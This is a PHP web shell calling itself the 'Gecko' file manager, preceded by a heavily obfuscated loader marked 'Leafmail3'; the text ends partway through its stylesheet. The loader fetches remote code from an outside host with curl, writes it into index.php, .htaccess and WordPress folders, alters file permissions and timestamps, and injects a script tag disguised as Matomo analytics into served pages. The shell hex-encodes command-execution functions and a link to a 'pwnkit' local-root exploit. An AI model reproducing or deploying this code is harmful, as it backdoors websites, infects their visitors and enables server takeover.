Sindbad~EG File Manager
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
session_start();
$Array = [
'7368656c6c5f65786563',
'65786563',
'7061737374687275',
'73797374656d',
'70726f635f6f70656e',
'706f70656e',
'70636c6f7365',
'72657475726e',
'73747265616d5f6765745f636f6e74656e7473',
'676574637764', // g e t c w d => 9
'6368646972', // c h d i r => 10
'7068705f756e616d65', // p h p _ u n a m e => 11
'6973736574',
'66756e6374696f6e5f657869737473',
'5f6d61645f636d64',
'245f5345525645525b275345525645525f4e414d45275d',
'676c6f62', // g l o b => 16
'69735f66696c65', // i s _ f i l e => 17
'69735f646972', // i s _ d i r => 18
'69735f7772697461626c65', // i s _ w r i t e a b l e => 19
'69735f7265616461626c65', // i s _ r e a d b l e => 20
'66696c6573697a65', // f i l e _ s i z e => 21
'6765745f63757272656e745f75736572', // user => 22
'5345525645525f534f465457415245', // Server Software => 23
'66696c656d74696d65', // f i l e m t i m e => 24
'746f756368', // t o u c h => 25
'6d6b646972', // m k d i r => 26
'66696c655f6765745f636f6e74656e7473', // f i l e g e t c o n t e n t s => 27
'66696c655f7075745f636f6e74656e7473', // f i l e p u t => 28
'726d646972', // r m d i r => 29
'756e6c696e6b', // u n l i n k => 30
'66696c65', // f i l e => 31
'6d756c7469706172742f666f726d2d64617461', // m u l t i p a r t / f o r m d a t a => 32
'444f43554d454e545f524f4f54', // r o o t d o c => 33
'68747470733a2f2f7777772e6861786f726469736c616e642e746563682f6c6f63616c726f6f742f70776e6b6974' // Source maybe? => 34
];
$hitung_array = count($Array);
for ($i = 0; $i < $hitung_array; $i++) {
$fungsi[] = unhex($Array[$i]);
}
if (!empty($_GET['download'])) {
$nameNyafile = basename($_GET['download']);
$pathFilenya = $fungsi[9]() . "/" . $nameNyafile;
if (!empty($nameNyafile) && file_exists($pathFilenya)) {
// Define Headers
header('Cache-control: public');
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $nameNyafile . '"');
header('Content-Transfer-Encoding: binary');
/**ZHNnc2RmZ2VydHNkZmdzZGZnc2RmZ3NkZmdzZGZn**/
readfile($pathFilenya);
exit;
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Gecko [ <?= $_SERVER['HTTP_HOST']; ?> ]</title>
<link rel="shortcut icon" href="logo.png" type="image/x-icon">
<script src='https://kit.fontawesome.com/057b9b510c.js' crossorigin='anonymous'></script>
<style>
@import url('https://fonts.googleapis.com/css2?family=Press+Start+2P&display=swap');
body {
font-family: monospace;
background-color: #1A1A1D;
color: white;
}
a {
text-decoration: none;
color: white;
}
tr th {
text-align: center;
font-weight: bold;
padding: 10px;
}
tr td:nth-child(3) {
text-align: center;
}
tr td {
padding: 10px;
font-weight: bold;
}
thead {
background-color: #29292e;
color: white;
}
ul {
list-style: none;
}
ul li {
font-weight: bold;
}
h1 {
font-family: 'Nanum Brush Script', cursive;
}
tbody tr:nth-child(even) {
background: #29292e;
}
.pwd {
padding: 5px;
background-color: #29292e;
}
form li {
margin: 15px;
margin-left: -5px;
}
form li input[type="file"] {
border: 1px solid;
padding: 3.5px 4px;
background-color: #29292e;
color: white;
border-radius: 5px;
}
.upload-submit {
float: left;
padding: 6.4px 50px;
margin-right: 10px;
font-weight: bold;
background-color: #29292e;
border: none;
color: #1e9fc7;
box-shadow: 1.5px 1.5px #303038;
border-radius: 3px;
}
.upload-submit:hover {
background-color: #d5dbd6;
color: black;
}
.link-shell:hover::after {
content: "";
border-bottom: 2px solid white;
display: block;
padding-bottom: 5px;
margin-bottom: -7px;
animation-name: link-shell;
animation-duration: 0.6s;
}
@keyframes link-shell {
from {
width: 0;
}
to {
width: 100%;
}
}
.tool-menu li {
display: inline-block;
font-weight: none;
padding: 13px 7px;
}
.tool-menu li a {
padding: 7px 30px;
color: #1e9fc7;
background-color: #29292e;
border-radius: 3px;
box-shadow: 1.5px 1.5px #303038;
}
.tool-menu li a:hover {
background-color: #d5dbd6;
color: black;
box-shadow: 1.5px 1.5px #d5dbd6;
}
.list-tool {
padding: 1px;
}
.settings {
float: right;
position: relative;
margin-top: -200px;
}
.settings select {
padding: 5.5px 35px;
background-color: #303038;
border: none;
color: white;
border-radius: 4px;
}
.select-submit {
padding: 6.5px 50px;
margin-right: 10px;
background-color: #303038;
border: none;
color: white;
border-radius: 4px;
}
.select-submit:hover {
background-color: #d5dbd6;
color: black;
}
.action-gecko:hover {
background-color: #d5dbd6;
color: black;
}
.tool-menu-header {
margin: -13px 0px;
}
.create {
background-color: rgba(0, 0, 0, 0.3);
position: fixed;
display: flex;
align-items: center;
justify-content: center;
top: 0;
left: 0;
height: 100vh;
width: 100vw;
animation: modal-box;
animation-duration: 0.5s;
animation-fill-mode: both;
}
@keyframes modal-box {
from {
opacity: 0;
}
to {
opacity: 1;
}
}
.modal {
border-radius: 10px;
background-color: white;
color: black;
width: 600px;
max-width: 100%;
padding: 18px;
}
.modal a {
background-color: #29292e;
padding: 8px 15px;
border-radius: 3px;
}
.modal ul {
float: right;
}
.modal ul li {
display: inline;
}
.btn-modal {
background-color: #29292e;
color: white;
border-radius: 3px;
padding: 8px 15px;
border: none;
}
.modal input[type="text"] {
width: 100%;
height: 30px;
border-radius: 3px;
border: 1px solid black;
}
.fw-bold {
font-weight: bold;
}
.file-size {
color: #1e9fc7;
}
th {
color: #1e9fc7;
}
.fa-folder {
color: orange;
}
.fa-file {
color: #1e9fc7;
}
.terminal-content {
z-index: 10;
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
width: 100%;
height: 100vh;
background-color: rgba(0, 0, 0, 0.5);
animation: modal-box;
animation-duration: 0.5s;
animation-fill-mode: both;
font-weight: bold;
}
.terminal-body {
margin: auto;
margin-top: 60px;
z-index: 20;
width: 90%;
background: white;
height: 65vh;
color: black;
border-radius: 5px;
}
.terminal-body header {
text-align: center;
padding: 4px;
background: #1A1A1D;
color: white;
